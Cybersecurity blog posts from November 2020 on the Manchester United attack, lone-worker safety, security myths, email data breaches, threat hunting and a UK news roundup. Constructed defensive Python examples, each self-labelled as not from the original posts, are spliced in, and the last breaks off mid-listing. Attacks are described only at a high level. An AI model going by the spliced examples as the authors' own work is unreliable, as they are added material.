Monday 30 November 2020

The Multi-Million Pound Manchester United Hack

Earlier this year I wrote a blog post about the Manchester City Billion Pound Hack, which explored cyberattacks within elite football. Now it is the turn of City's big rivals Manchester United, who have confirmed that their IT systems were hit by a cyber-attack, widely reported in the UK media as a cyber-extortion attack.

In the last couple of years, cybercriminals have significantly ramped up their targeting of UK businesses with cyber extortion attacks, using ransomware and the theft of confidential data as leverage to force victims into paying large ransoms anonymously in Bitcoin. Many businesses have been quick to pay after their operations ground to a halt because ransomware rendered their IT systems unusable, and to stop the cybercriminals dumping their confidential data on the internet.

In July 2020 the UK National Cyber Security Centre (NCSC) specifically warned in a report that cybercriminals were targeting UK sports teams with ransomware attacks. The report cited a ransomware attack against an unnamed English Football League club which crippled its IT systems to the extent that the turnstiles stopped working and a league fixture was almost cancelled, which would have cost the club hundreds of thousands of pounds in lost income. NCSC reported it suspected the attackers gained access to the club's network either via a phishing email or via a remote access system connected to the club's CCTV. That access was used to spread ransomware across the club's entire IT network. It is understood the cybercriminals behind the attack demanded 400 bitcoin (over £300,000), which was not paid. It seems Manchester United have been targeted in a similar way.

In a statement on 20th November 2020, Manchester United stated, 

'Manchester United can confirm that the club has experienced a cyber attack on its systems. The club has taken swift actions to contain the attack and is currently working with expert advisers to investigate the incident and minimize the ongoing IT disruption.

Although this is a sophisticated operation by organized cyber criminals, the club has extensive protocols and procedures in place for such an event and had rehearsed for this risk. Our cyber defenses identified the attack and shut down affected systems to contain the damage and protect data.'

Despite the assurances in the statement, the cyber-attack does not appear to have been contained and recovered from as yet: the Daily Mirror and the Daily Mail reported on 28th and 29th November 2020 respectively that hackers had accessed the club's scouting system, including 'confidential information on targets and scouting missions'. Several UK newspapers also reported that the club's email system remains disabled.

As yet, no details have been released about the ingress method, the malware used or the suspected perpetrators. When asked for details, Man Utd stated 'The club will not be commenting on speculation regarding who may have been responsible for this attack or the motives behind it.' Without any details released by the club or leaked, it is difficult to draw conclusions at this stage, but we can speculate.

The likely suspect is a variant of the Ryuk ransomware, possibly orchestrated by the Ryuk criminal group and delivered following last month's reported resurgence of the Emotet trojan, a common dropper of ransomware. It was a new variant of Ryuk that was behind the cyberattack on digital services firm Sopra Steria in October 2020. Another common delivery mechanism for ransomware is the Trickbot trojan; however, Microsoft and its partners took action last month to disrupt the Trickbot botnet.

No details have been released on how much this incident is costing Manchester United, nor on the ransom being demanded. The media have speculated the ransom to be in the millions, likely based on that recent NCSC report, which stated an EFL club faced a £5 million ransom from cyber attackers.

If this attack is found to have breached Manchester United fans' data protection rights under the UK Data Protection Act 2018 (which implements GDPR), the club could face a fine from the UK Information Commissioner's Office of up to €20m (about £18m) or 4% of its total annual worldwide turnover, whichever is higher. Further, given Manchester United is listed on the New York Stock Exchange, the club could face additional penalties under US sanctions law if it decides to pay the ransom; that fine could be up to $20m (about £15m).

The US Office of Foreign Assets Control (OFAC) warned that paying the ransom demand would only boost the criminals’ finances and encourage them to strike again elsewhere, stating, 

‘Facilitating a ransomware payment that is demanded as a result of malicious cyber activities may enable criminals and adversaries with a sanctions nexus to profit and advance their illicit aims.

Ransomware payments may also embolden cyber actors to engage in future attacks'

The last sentence of the OFAC statement is an essential point: with so many organisations giving in to cyber-extortion demands and paying up, the payments are fuelling further attacks.

If it were made illegal in the UK to pay a cyber extortion demand, that law would remove the temptation to give up on recovery and pay, and would push UK organisations into investing in and deploying the appropriate level of cybersecurity controls to counter the risk, because there are simple security controls which can adequately thwart most ransomware and data theft attacks. The simple truth is that most ransomware and data theft attacks aren't really 'sophisticated'; they can be prevented by applying the security basics: continually patching IT systems (especially internet-facing remote access and VPN appliances), requiring multi-factor authentication on all remote access, deploying anti-virus and keeping it up to date, blocking suspicious external emails, and ensuring staff have a good level of security awareness, particularly the ability to spot phishing emails.

Unless the 'reward vs effort' calculation of global criminal threat actors is pushed down, we can expect to see further high-profile businesses like Manchester United targeted with cyber extortion attacks, which ultimately cause significant reputational and financial damage to the organisations concerned.

Tuesday 24 November 2020

Advice: Protecting Lone Workers Through Covid Restrictions

Protecting lone workers is an issue that businesses may not have come across previously, especially those based in busy city centre office blocks pre-coronavirus. Yet with many thriving business districts deserted through a lockdown and not everyone able to work from home, it’s an issue more management teams are having to consider. 
Firms could be inadvertently putting employees at security, mental health/wellbeing and medical risk
Here, Jonathan Fell of digital security provider Digital ID, outlines some of the ways to protect members of staff who find themselves lone working during lockdown number two.

“Most businesses have got to grips with the challenges around managing teams remotely, but what about the needs of those employees who can’t or won’t work from home? In following Government guidelines, firms could be inadvertently putting employees who need to stay office-based at risk in other areas – security, mental health/wellbeing and medical suitability being just a few of the potential causes for concern.

“Even if there are a small number of employees in the workplace you should still put procedures in place for times in the day when workers will be alone for example lunchbreaks and variations in contracted hours.”

Security and Access Control
“Security is one of the main concerns,” said Jonathan. “Ensuring that staff members are not put into dangerous situations in the workplace. Don’t forget, empty offices could be a potential target for robberies, leaving staff on their own more vulnerable to theft. Your lone worker will need briefing and support on how to identify and report threats. 

Empty offices are targets for robberies, lone office workers need support on dealing with such threats

“An update to the security system will be needed to reflect who is coming in and out of the building. In terms of ID cards that means making sure your policies are updated to include new procedures relating to lone workers and the building.

“Someone should be appointed to monitor the login records to ensure staff arrive and leave at the expected times – luckily that’s easy to do remotely with a digital ID card system. If your current access control system doesn’t allow you to do this, you should really think about upgrading your system.”

Find out more about this over on the Digital ID blog: https://www.digitalid.co.uk/blog/to-upgrade-or-not-to-upgrade-why-2020-is-the-time-to-migrate-your-access-control-system

“Having someone on call and close enough to respond in an emergency is another important consideration. A tip here is to print emergency contact details onto the reverse of their ID or access cards. Given that these should be kept on the person at all times, it means contact numbers are easy to find and use if a person needs help quickly.

“Things like checking your employee has good mobile phone coverage in the place of work is something a lot of people don’t think about but is very important these days. If they don’t, then they’ll need an active landline within easy access.

“If photo ID is connected to an access control system, you may need to restrict access to some of the building in light of any new changes. Think about where needs to be accessed and how frequently by the lone worker, perhaps moving some things around within the building to ensure they can stick to a smaller footprint that will put them less at risk.

“A final thought on security is that coming in and leaving at exactly the same time every day carrying laptops or other equipment could make them a target for personal theft, this needs to be weighed up against travelling at times when it’s dark and isolated. All should be covered in a full risk assessment.

“It’s worth remembering that as a business you’re responsible for workers lone working at home too, so while there will not be complicated access concerns here, looking after the mental health and wellbeing of your team should remain a priority, as well as making sure they know what to do in a medical emergency.”

Digital ID is the UK’s largest ID card company offering a complete service. For 25 years the organisation has helped businesses and their employees stay secure. It provides a range of products and services including plastic ID card printing, ID card printers and lanyards tailored to meet the requirements of its customers. Find out more at www.digitalid.co.uk
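The login-record monitoring described in the advice above (someone checking that staff arrive and leave when expected, and knowing when a person is on their own in the building) can be automated against an export from the access-control system. The following is an added example, not code from Digital ID or from the original post. The badge-event log is constructed, and its CSV layout, the badge IDs, the contracted arrival and departure windows and the site closing time are all assumptions; the code flags early arrivals, late departures, after-hours entries and badges that never badged out, and works out the periods during which exactly one person was inside, which is the lone-working exposure a risk assessment needs to quantify.

```python
"""Lone-worker checks over an access-control (badge) log.

Added example, not code from Digital ID or the original post. The log
layout "timestamp,badge_id,IN|OUT", the badge IDs and the expected hours
are assumptions made for illustration.
"""
from datetime import datetime, time

# Constructed sample log for one day; in practice export this from the
# access-control system.
SAMPLE_LOG = """\
2020-11-24T07:10:00,B001,IN
2020-11-24T08:55:00,B002,IN
2020-11-24T12:30:00,B002,OUT
2020-11-24T13:15:00,B002,IN
2020-11-24T17:05:00,B001,OUT
2020-11-24T19:40:00,B002,OUT
2020-11-24T22:30:00,B003,IN
"""

EXPECTED_ARRIVE_FROM = time(7, 30)   # assumed earliest contracted arrival
EXPECTED_LEAVE_BY = time(18, 30)     # assumed latest contracted departure
SITE_CLOSES = time(21, 0)            # assumed: any entry after this is out of hours


def parse_log(text):
    """Return a time-ordered list of (timestamp, badge, direction)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, badge, direction = line.strip().split(",")
        events.append((datetime.fromisoformat(ts), badge, direction.upper()))
    events.sort()
    return events


def hours_flags(events):
    """Flag badge activity outside the expected working pattern."""
    first_in, last_out, flags = {}, {}, []
    for ts, badge, direction in events:
        if direction == "IN":
            first_in.setdefault(badge, ts)
            if ts.time() >= SITE_CLOSES:
                flags.append((badge, f"entered after site closed at {ts.time()}"))
        else:
            last_out[badge] = ts
    for badge, ts in first_in.items():
        if ts.time() < EXPECTED_ARRIVE_FROM:
            flags.append((badge, f"arrived early at {ts.time()}"))
        if badge not in last_out:
            flags.append((badge, "badged in but never badged out"))
    for badge, ts in last_out.items():
        if ts.time() > EXPECTED_LEAVE_BY:
            flags.append((badge, f"left late at {ts.time()}"))
    return flags


def lone_periods(events):
    """Return (periods, still_inside).

    periods: list of (badge, start, end, minutes) during which exactly one
    badge holder was inside; end and minutes are None if the period was
    still open when the log ended.
    """
    inside, periods, lone_since = set(), [], None
    for ts, badge, direction in events:
        if direction == "IN":
            inside.add(badge)
        else:
            inside.discard(badge)
        if len(inside) == 1 and lone_since is None:
            lone_since = (next(iter(inside)), ts)
        elif len(inside) != 1 and lone_since is not None:
            who, start = lone_since
            periods.append((who, start, ts, int((ts - start).total_seconds() // 60)))
            lone_since = None
    if lone_since is not None:
        periods.append((lone_since[0], lone_since[1], None, None))
    return periods, sorted(inside)


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    for badge, reason in hours_flags(evts):
        print(f"FLAG {badge}: {reason}")
    periods, inside = lone_periods(evts)
    for who, start, end, mins in periods:
        end_text = "end of log" if end is None else f"{end.time()} ({mins} min)"
        print(f"LONE {who} from {start.time()} to {end_text}")
    print("still inside at end of log:", inside)
```

Run daily against the previous day's export; the "badged in but never badged out" and "still inside at end of log" results are the ones that warrant a phone call, and the lone periods show where a check-in procedure is needed.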

Monday 23 November 2020

Seven Debunked Myths of Cybersecurity

Article by Kristin Herman, a writer and editor at Ukwritings.com and Academized.com

The term 'cybersecurity' has been tossed around a lot lately. But although cybersecurity has been viewed as a saving grace for mobile devices, computers and the like, the topic is still cloaked in misconception. Questions that come up, when it comes to cybersecurity, include:
  • The idea of security
  • Password strength
  • Who cybersecurity threats target and affect
  • Whether insurance will cover damages
  • How effective an IT team actually is
  • Cybersecurity “costs”
  • Which devices are most vulnerable to malware
However, with one side saying one thing and the other contesting it, it's easy to get caught up in believing the wrong things. In fact, a lot of people get it wrong. So, to understand the truth about cybersecurity, check out this quick guide, which covers seven of the most common myths about the subject, debunked:

1. “Physical Security and Cybersecurity are Two Different Things”
“The truth is, physical security is not separate from cybersecurity,” says Angela Macquarie, a business writer at Academized and Oxessays. “Both can help safeguard machines and paper documents. And, while both can function online and offline, the things they protect will hold sensitive data, which can be at risk of being exposed if the owner or holder is not careful.”

2. “Having a Good Password Protects You”
When it comes to passwords, you can't leave anything to chance. Weak passwords are still commonplace, even though it's hard to imagine many people still using passwords like “123456” or “qwerty” after being warned not to. Therefore, it's imperative to make your passwords long and hard for other people to guess, use a different one for every account, and change any password you suspect has been exposed, so that you stay one step ahead of cybercriminals. Even a good password on its own is not enough, though: enable two-factor authentication wherever it is offered, so that a stolen or guessed password does not hand over the account.

3. “Cybercriminals only Attack Large Businesses”
Wrong. Cybercriminals will go after any type of business – big or small. Since cyber thieves don’t discriminate, it’s important to keep your devices and data safe with an effective cybersecurity framework, regardless of the size of a business.

4. “Insurance will cover Cybersecurity Breaches”
Wrong again. In actuality, most insurance policies won’t cover businesses in the event of a data breach. While some policies might cover financial losses that have transpired from it, most policies won’t.

So, when shopping around for business-related insurance, make sure that policies will be able to compensate you whenever the dreaded breach springs up at any time. Or, you can buy insurance and cybersecurity separately. Purchasing cyber and data insurance will be worth the investment if you’re looking to protect customer and or sensitive data from infiltration.

5. “The IT Team has you Covered”
Think that IT teams can save your business, whenever data breaches happen? Think again!

While IT staff will most likely know about potential vulnerabilities and hacker techniques, they still can’t control all the elements involved. Your IT staff, instead, will only act as a human firewall to prevent breaches that stem from human error. Therefore, make it your job to add more layers of protection, besides your IT team.

6. “Cybersecurity is Costly”
“When people think about cybersecurity, they assume that investing in it will cost hundreds, or thousands, of dollars,” says Sheila Flynn, a marketing blogger at Boom Essays and Paper Fellows. “However, having a strong human firewall to defend you against cybercrime is entirely free – apart from creating an IT security policy and training staff. Investment can go a long way, as cybersecurity will greatly benefit your business.”

As such, consider consulting a cybersecurity expert, or look into comprehensive training and advice from cybersecurity experts, to help you put together an effective system that will protect all of your devices and data.

7. “Viruses only affect Desktops”
As technology continues to evolve – especially with more advanced smartphones and tablets working in almost the same capacity as computers – viruses aren’t just a computer thing. In fact, smartphones, tablets, and other mobile devices can fall victim to malware, if the user doesn’t have enough protection for them. And although it only took Internet access for malware to get to computers, other devices that connect to the Internet are still just as vulnerable to viruses.

Conclusion
As you read through these seven debunked myths, we hope that you have a better understanding of cybersecurity. The ultimate goal of this guide is to keep you – the device user – informed. By learning how cybercriminals work, and learning the truth about today’s debunked myths, you’ll learn from the mistakes that you might be making now with your devices, and fix them right away.

About the Author: Kristin Herman is a writer and editor at Ukwritings.com and Stateofwriting.com. She is also a contributing writer for online publications, such as Essayroo.com. As a marketing writer, she blogs about the latest trends in online advertising and social media influencing.

Monday 16 November 2020

Check, Please! Adding up the Costs of a Financial Data Breach

Guest article by Andrea Babbs, UK General Manager at VIPRE

Reliance on email as a fundamental function of business communication has been in place for some time. But as remote working has become a key factor for the majority of business during 2020, it’s arguably more important than ever as a communication tool. The fact that roughly 206.4 billion emails are sent and received each day means we’re all very familiar with that dreaded feeling of sending an email with typos, with the wrong attachment, or to the wrong contact. But this can be more than just an embarrassing mistake – the ramifications could, in fact, be catastrophic. 
Check Please! Within the financial services, layered cybersecurity strategy is essential to keep sensitive information secure
In particular, for the financial services industry that deals with highly sensitive information including monetary transactions and financial data, the consequences of this information falling into the wrong hands could mean the loss of significant sums of money. Emails of this nature are the Holy Grail for cybercriminals. So how can financial services organisations keep their confidential information secure to safeguard their data and reputation? 

How much?
According to research from the Ponemon Institute in its Cost of a Data Breach Report 2020, organisations spend an average of $3.85 million recovering from security incidents, with the usual time to identify and contain a breach being 280 days. Accenture’s Ninth Annual Cost of Cybercrime study (2019) found that financial services incurred the highest cybercrime costs of all industries. And while examples of external threats seem to make the headlines, such as the Capital One cyber incident, unintentional or insider breaches don’t always garner as much attention. Yet they are both as dangerous as each other. In fact, human errors (including misdeliveries via email) are almost twice as likely to result in confirmed data disclosure.

Costs will be wide-ranging depending on the scale of each breach, but at a minimum, there will be financial penalties, costs for audits to understand why the incident happened and what additional protocols and solutions need to be implemented to prevent it from happening in the future. There could also be huge costs involved for reimbursing customers who may have been affected by the breach in turn.

Priceless damage
The fallout from data breaches goes far beyond that of financial penalties and costs. Financial services businesses have reputations to uphold in order to maintain a loyal customer base. Those that fail to protect their customers’ sensitive information will have to manage the negative press and mistrust from existing and potential customers that could seriously impede the organisation as a whole. Within such a highly competitive market, it doesn’t take much for customers to take their money elsewhere – customer service and reputation is everything.

Check, please!
Within the financial services sector, the stakes are high, so an effective, layered cybersecurity strategy is essential to mitigate risk and keep sensitive information secure. With this, there are three critical components that must be considered: 
  1. Authentication and encryption: Hackers may try to attack systems directly or intercept emails via an insecure transport link. Security protocols (TLS for the transport link, and SPF, DKIM and DMARC for sender authentication) are designed to prevent most instances of unauthorised interception, content modification and email spoofing. Adding a dedicated email-to-email encryption service to your email security arsenal increases your protection in this area. Encryption and authentication, however, do not safeguard you against human errors and misdeliveries. 
  2. Policies and training: Security guidelines and rules regarding the circulation and storage of sensitive financial information are essential, as are clear steps to follow when a security incident happens. Employees must undergo cybersecurity awareness training when they join the organisation and then be enrolled in an ongoing programme of short, informative sessions held quarterly or monthly. This training should incorporate ongoing simulated phishing attacks, to show users how these incidents appear and to teach them how to spot and flag them. Automated phishing simulations also provide key metrics and reports on how users are improving. This regular reinforcement of the secure messaging, working in tandem with the simulations, ensures that everyone is capable of spotting a phishing scam and knows how to handle sensitive information, because they are reminded regularly of the risks involved. 
  3. Data loss prevention (DLP): DLP solutions enable the firm to implement security measures for the detection, control and prevention of risky email sending behaviours. Purely technical solutions such as machine learning can only go so far in preventing breaches; it is the human element that can truly decide what is safe to send and what is not. In practice, machine learning will either stop everything from being sent, becoming more of a nuisance than a support to users, or it will stop nothing. Rather than disabling time-saving features such as autocomplete to prevent employees from becoming complacent when selecting the right email recipient, DLP solutions do not impede the working practices of users but instead give them a critical second chance to double-check.
It is this double-check that can be the critical factor in an organisation’s cybersecurity efforts. Users can be prompted based on several parameters that can be specified. For example, colleagues in different departments exchanging confidential documents with each other and external suppliers means that the TO and CC fields are likely to have multiple recipients in them. A simple incorrect email address or a cleverly disguised spoofed email cropping up with emails going back and forth is likely to be missed without a tool in place to highlight this to the user, to give them a chance to double-check the accuracy of email recipients and the contents of attachments.
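A concrete form of the "second chance" check described above, as an added example that is not VIPRE's product or the author's code: before the mail leaves, examine the recipient list and the content and return the warnings the sender should see. The internal domain, the list of known partner domains, the sensitivity rules and the sample message are all constructed assumptions. The check flags recipient domains within one edit of a trusted domain (the "cleverly disguised spoofed email" case), external recipients at unknown domains, and sensitive attachments or card numbers in the body when any recipient is external; card-number candidates are Luhn-validated so that order references and phone numbers do not trigger it.

```python
"""Pre-send check for outgoing email, in the spirit of the DLP prompt above.

Added example, not VIPRE's product or the author's code. The internal
domain, the partner domains, the sensitivity rules and the sample message
are assumptions constructed for illustration.
"""
import re

INTERNAL_DOMAIN = "acme-bank.example"                       # assumption
KNOWN_PARTNERS = {"supplier.example", "auditor.example"}    # assumption
SENSITIVE_NAME = re.compile(r"statement|account|payroll|iban|card", re.I)
PAN_CANDIDATE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")     # 13 to 19 digits


def levenshtein(a, b):
    """Edit distance, used to spot look-alike domains (supplier vs suplier)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def luhn_ok(digits):
    """Luhn checksum, so that phone numbers and order IDs are not flagged as cards."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def card_numbers_in(text):
    """Return Luhn-valid card-number-like digit runs found in free text."""
    found = []
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"\D", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            found.append(digits)
    return found


def domain_of(address):
    return address.rsplit("@", 1)[-1].lower()


def lookalike_of(domain, known_domains):
    """Return the known domain this one is within one edit of, if any."""
    for known in sorted(known_domains):
        if domain != known and levenshtein(domain, known) <= 1:
            return known
    return None


def check_outgoing(recipients, attachments, body):
    """Return the warnings to show the sender before the mail leaves."""
    warnings = []
    trusted = KNOWN_PARTNERS | {INTERNAL_DOMAIN}
    external = []
    for rcpt in recipients:
        dom = domain_of(rcpt)
        if dom != INTERNAL_DOMAIN:
            external.append(rcpt)
        near = lookalike_of(dom, trusted)
        if near:
            warnings.append(f"{rcpt}: domain resembles {near} but is not it (typo or spoof?)")
        elif dom not in trusted:
            warnings.append(f"{rcpt}: external recipient at an unknown domain")
    sensitive = [a for a in attachments if SENSITIVE_NAME.search(a)]
    pans = card_numbers_in(body)
    if pans:
        sensitive.append(f"{len(pans)} card number(s) in the message body")
    if sensitive and external:
        warnings.append(f"sensitive content ({'; '.join(sensitive)}) is addressed to "
                        f"{len(external)} external recipient(s): {', '.join(external)}")
    return warnings


# Constructed sample message: one look-alike partner domain, one unknown
# external domain, a sensitive attachment and a card number in the body.
SAMPLE_RECIPIENTS = ["alice@acme-bank.example", "bob@supplier.example",
                     "carol@suplier.example", "dave@webmail.example"]
SAMPLE_ATTACHMENTS = ["Q3_account_statement.xlsx"]
SAMPLE_BODY = "Hi all, the card 4111 1111 1111 1111 was charged twice, see attached."

if __name__ == "__main__":
    for warning in check_outgoing(SAMPLE_RECIPIENTS, SAMPLE_ATTACHMENTS, SAMPLE_BODY):
        print("WARN:", warning)
```

The warnings are meant to be shown to the user as a prompt, not to block the send: the sender decides, but only after a second look at exactly the fields (recipient domains, attachment, body) that misdeliveries hinge on.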

Conclusion
Email remains a risky, yet essential tool for every business. But with a layered security strategy in place consisting of training, authentication tools and DLP solutions, organisations can minimise the risks involved and take a proactive approach to their cyber defences.

Given the nature of the industry, financial services organisations are a prime target for cybercriminals. The temptation of personal information and financial transactions for hackers is never going to dwindle, so financial institutions must prioritise cybersecurity, regularly assessing risks, deploying innovative, human-led solutions and educating workforces to provide the best defence possible.

Tuesday 10 November 2020

One Step Beyond: Using Threat Hunting to Anticipate the Unknown

Article by Paul German, CEO, Certes Networks

A cyber threat could be lurking in any corner of an organisation’s infrastructure. The complex networks encompassing numerous smart and interconnected technologies make it easy for cybercriminals to hide, but much harder for them to be found.

Yet, waiting for a cyber threat to make an appearance is far too dangerous; if left undetected, a cybercriminal could stay in an organisation’s network for years - and just think of the damage that could be caused. To combat this, threat hunting is now an essential component of any cybersecurity strategy. Rather than waiting for a hacker to make themselves known, threat hunting involves constantly and proactively searching for the threats hiding within a system, working on the assumption that a cyber hacker is ever-present and looking for signs of unusual activity before it even occurs.

But how does threat hunting work in practice, and how can the approach ensure an organisation’s data is kept safe? Here is why a proactive approach to cybersecurity is essential at a time when the threat has never been more severe.
Anticipating the unknown is the only way to stay ahead of hackers

The Need for Observability 
Today’s networks are complex, presenting numerous places for a cyber hacker to hide. And unfortunately, it’s not uncommon for infiltrations to go undetected in networks for days, weeks or months. In fact, a recent report shows that it takes organisations an average of 280 days to identify and contain a data breach, but organisations can’t afford to wait this long. In this time, a cyber hacker can be travelling through the network, infiltrating systems and stealing information, making an organisation’s data increasingly vulnerable.

And the length of time can even be longer than this; in the 2018 Marriott International data breach, hackers were accessing the network for over four years before they were discovered, which resulted in the records of 339 million guests being exposed. The hotel chain then suffered a second data breach this year after cybercriminals had been in the network for over one month, impacting approximately 5.2 million guests.

So, what needs to change? It is now more important than ever for organisations to be able to analyse contextual data in order to make informed decisions regarding their network security policy. This is not possible without 24/7/365 managed detection and response (MDR) capability for proactive threat hunting that draws on event monitoring logs, automated use-case data, contextual analysis, incident alerting and response, and knowledge of attackers' tactics, techniques and procedures (TTPs) to identify issues and improve an organisation’s security posture.

Anticipating the Unknown
When anticipating the unknown, cybersecurity analytics tools can capture data and detect evasive and malicious activity in real time, wherever it is in the network. Generating fine-grained policies and enforcing them is one step security teams can take to proactively detect and remediate malicious activity immediately. With policy enforcement, attackers will have a hard time making lateral ‘east-west’ movements or remaining hidden in any part of the network, because the security team can see inside the network and protect against threats across all attack surfaces and all managed endpoints with a unified multi-layer approach. This includes policy generation and enforcement MDR tools that provide greater insight into the overall reliability, impact and success of network systems, their workload and their behaviour, in order to identify threats and proactively respond and protect assets. 

In reality, this means that security teams can take measurable steps towards controlling system access of the network environment; knowing who is in the network, who should be able to access what data and which applications, and being the first to detect indicators of compromise (IOC).
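What "being the first to detect indicators of compromise" looks like for east-west movement, as an added example that is not Certes Networks' product or code: three hunting rules run over network logon events. The log layout, the hostnames (workstations assumed to be named "WS-…"), the baseline week and the thresholds are constructed assumptions. Rule 1 reports a user reaching a host they never reached during the baseline period, rule 2 reports workstation-to-workstation network logons (Windows logon type 3, which ordinary users rarely need between workstations), and rule 3 reports one source touching several distinct hosts within a short window, the fan-out pattern of credential reuse after a foothold.

```python
"""Threat-hunting rules for lateral ('east-west') movement over logon events.

Added example, not Certes Networks' product or code. The log layout
"timestamp,user,src_host,dst_host,logon_type", the hostnames, the baseline
week and the thresholds are all assumptions constructed for illustration.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed baseline: a normal week of network logons.
BASELINE_LOG = """\
2020-11-03T09:00:00,alice,WS-ALICE,FS01,3
2020-11-03T09:05:00,bob,WS-BOB,FS01,3
2020-11-03T22:00:00,svc_backup,BK01,FS01,3
2020-11-03T22:10:00,svc_backup,BK01,FS02,3
2020-11-04T09:01:00,alice,WS-ALICE,FS01,3
"""

# Constructed hunt window: alice's workstation starts touching other workstations.
HUNT_LOG = """\
2020-11-10T09:00:00,bob,WS-BOB,FS01,3
2020-11-10T09:02:00,alice,WS-ALICE,FS01,3
2020-11-10T09:03:00,alice,WS-ALICE,WS-BOB,3
2020-11-10T09:04:30,alice,WS-ALICE,WS-CAROL,3
2020-11-10T09:06:00,alice,WS-ALICE,WS-DAVE,3
2020-11-10T14:00:00,svc_backup,BK01,FS02,3
"""

WORKSTATION_PREFIX = "WS-"          # assumed naming convention
NETWORK_LOGON = "3"                 # Windows logon type 3 (network)
FANOUT_WINDOW = timedelta(minutes=10)
FANOUT_THRESHOLD = 3                # distinct destinations within the window


def parse_log(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, user, src, dst, ltype = line.strip().split(",")
            events.append({"ts": datetime.fromisoformat(ts), "user": user,
                           "src": src, "dst": dst, "type": ltype})
    return sorted(events, key=lambda e: e["ts"])


def baseline_pairs(events):
    """(user, destination) pairs seen during the baseline period."""
    return {(e["user"], e["dst"]) for e in events}


def hunt(events, baseline):
    """Return (rule, timestamp, detail) findings in time order."""
    findings = []
    seen_new = set()
    windows = defaultdict(deque)    # (user, src) -> recent (ts, dst)
    fired = set()                   # (user, src) already reported for fan-out
    for e in events:
        user, src, dst, ts = e["user"], e["src"], e["dst"], e["ts"]
        # Rule 1: a user reaching a host they have never reached before.
        if (user, dst) not in baseline and (user, dst) not in seen_new:
            seen_new.add((user, dst))
            findings.append(("new_pair", ts, f"{user} -> {dst} not in baseline"))
        # Rule 2: workstation-to-workstation network logon.
        if (e["type"] == NETWORK_LOGON and src.startswith(WORKSTATION_PREFIX)
                and dst.startswith(WORKSTATION_PREFIX)):
            findings.append(("east_west", ts, f"{user}: {src} -> {dst} (logon type 3)"))
        # Rule 3: fan-out, one source touching many hosts in a short window.
        win = windows[(user, src)]
        win.append((ts, dst))
        while win and ts - win[0][0] > FANOUT_WINDOW:
            win.popleft()
        distinct = {d for _, d in win}
        if len(distinct) >= FANOUT_THRESHOLD and (user, src) not in fired:
            fired.add((user, src))
            findings.append(("fan_out", ts, f"{user}@{src} reached {len(distinct)} hosts "
                                            f"within {FANOUT_WINDOW}: {sorted(distinct)}"))
    return findings


if __name__ == "__main__":
    base = baseline_pairs(parse_log(BASELINE_LOG))
    for rule, ts, detail in hunt(parse_log(HUNT_LOG), base):
        print(f"{ts} [{rule}] {detail}")
```

Each rule on its own produces noise (new file shares appear, administrators do touch workstations); the value is in the combination, where one account trips all three within a few minutes. In a real environment the baseline would be built from weeks of Windows event ID 4624 data rather than a five-line file.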

Ahead of the Game
Threat hunting is a way to stay one step ahead of cybercriminals. Organisations no longer have to wait to be alerted of a data breach before taking action; today it is essential to have a complete picture of the entire network in real-time, including extending these capabilities to teleworkers, so that unusual activity can be identified and halted immediately before any damage occurs. With strong MDR tools at the core, organisations can ensure a strong and effective security posture based on anticipating the unknown, clear visibility into vulnerabilities that pose the biggest threat and identifying barriers that prevent successful tracking and remediation.

Wednesday 4 November 2020

Cyber Security Roundup for November 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, October 2020.

London's Hackney Borough Council has been tight-lipped about "a serious cyber-attack" which took down its IT systems, impacting its service delivery to citizens. The council has provided scant information about the attack, but it has all the hallmarks of a ransomware outbreak. The council says it is working with the UK's National Cyber Security Centre (NCSC) and the Ministry of Housing to investigate and understand the impact of the incident. Ransomware attacks continue to be a major blight on UK public services, with organisations from councils to hospitals struggling to defend their IT systems against ransomware. Earlier this year Redcar and Cleveland Borough Council said it had been hit by a ransomware attack which cost it more than £10m.

It looks like ransomware will continue to pose a major threat to the UK for some time to come, with separate reports advising of a resurgence in the Emotet trojan, a common dropper of ransomware, while the hacking group behind the notorious Ryuk ransomware has been reported as active again. A new variant of the Ryuk ransomware was behind a cyberattack on Sopra Steria’s operations in October 2020, the digital services company confirmed.

British Airways had its credit card breach DPA fine cut by a massive £163m to £20m by the UK Information Commissioner's Office (ICO), which had imposed the original fine after the airline, now financially beleaguered by the pandemic, lost 430,000 payment card details to hackers in an e-commerce skimming attack in 2018.

BA lost 430,000 payment card details to hackers after a Magecart e-commerce skimming attack in 2018
This data breach was a lesson in failing at PCI DSS compliance, with customer credit card details stolen due to a ‘Magecart’ payment card skimming script being injected onto the BA payment page. The attackers initially compromised the BA network through a third-party worker’s remote access (not MFA protected), gaining access to BA's Citrix environment. Once inside the BA network, the attackers were gifted privileged access after finding a domain admin account username and password in plaintext in a server folder. I understand investigators found payment card data stored in plaintext, including CVV numbers retained after payment authorisation, which is never permitted under PCI DSS rules. Aside from the ICO fine and reputational damage, this breach is likely to have cost BA a small fortune in specialised PCI Forensic Investigator (PFI) work, a complete solution rebuild, and card brand penalties. The Visa Chief Enterprise Risk Officer once said ‘no compromised entity has yet been found to be in compliance with PCI DSS at the time of a breach’; I understand that statement still rings true today.
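The skimming script in the BA breach was a change to the payment page that nobody was checking for. An added example of the check a practitioner would run, not BA's code and not from the original post: inventory every script on the checkout page (external script URLs, plus SHA-256 hashes of inline script bodies) and diff that inventory against an approved baseline. The two pages below are constructed; the second is the first with an injected external script and an injected inline skimmer that posts the payment form to an outside host.

```python
"""Payment-page integrity check for Magecart-style script injection.

Added example, not BA's code and not from the original post. The pages are
constructed: SKIMMED_PAGE is BASELINE_PAGE with one injected external script
and one injected inline skimmer. A real deployment fetches the live checkout
page on a schedule and keeps the baseline inventory under change control.
"""
import hashlib
from html.parser import HTMLParser

BASELINE_PAGE = """<html><head>
<script src="https://static.example-airline.test/js/checkout.js"></script>
</head><body>
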